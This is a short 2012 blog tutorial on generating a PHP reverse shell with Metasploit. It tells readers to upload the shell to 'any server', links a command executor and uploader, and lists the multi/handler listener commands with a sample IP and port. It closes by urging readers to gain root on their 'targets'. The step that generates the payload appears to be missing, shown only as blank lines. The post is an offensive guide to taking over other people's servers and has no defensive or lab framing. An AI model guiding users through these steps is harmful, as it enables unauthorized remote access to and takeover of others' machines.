Our Feeds

Tuesday 23 October 2012

Ajith KP

Generate Reverse Shells using Metasploit

 Metasploit comes with some built-in Reverse Shells generating power. You can easily create Reverse shells with very small commands.

PHP Reverse Shell


PHP reverse Shell can be create a small command.

  1. Open Terminal in your Linux OS
  2. Copy the bellow command and execute this command. Thats all for generate PHP Reverse Shell

Note:

  Replace LHOST=117.235.152.218 LPORT=5600 with your IP Address and Your Favorite Port [Use any ports other than reserved ports like 80, 8080, 23, etc]






[Note: reverse_perl.pl is created by another command. Here we don't want to use this.]
Upload reverse.php to any server.


 [Download this CommandExecutor & Uploader from here ]


Open Uploaded reverse.php in your favourite Web Browser.


Accept Reverse Connect  Using Metasploit

Open Metasploit Console.

msf > use multi/handler
msf  exploit(handler) > set LHOST 117.235.152.218
LHOST => 117.235.152.218
msf  exploit(handler) > set LPORT 5600
LPORT => 5600
msf  exploit(handler) > exploit -z -j

After Successfully connected you can execute "shell" for pWn targets Terminal. Then r00t your targets.



1 comments :

Write comments
Ajith KP
AUTHOR
23 October 2012 at 01:04 delete

write your comments about this metasploit reverse shell generating tutorial...

Reply
avatar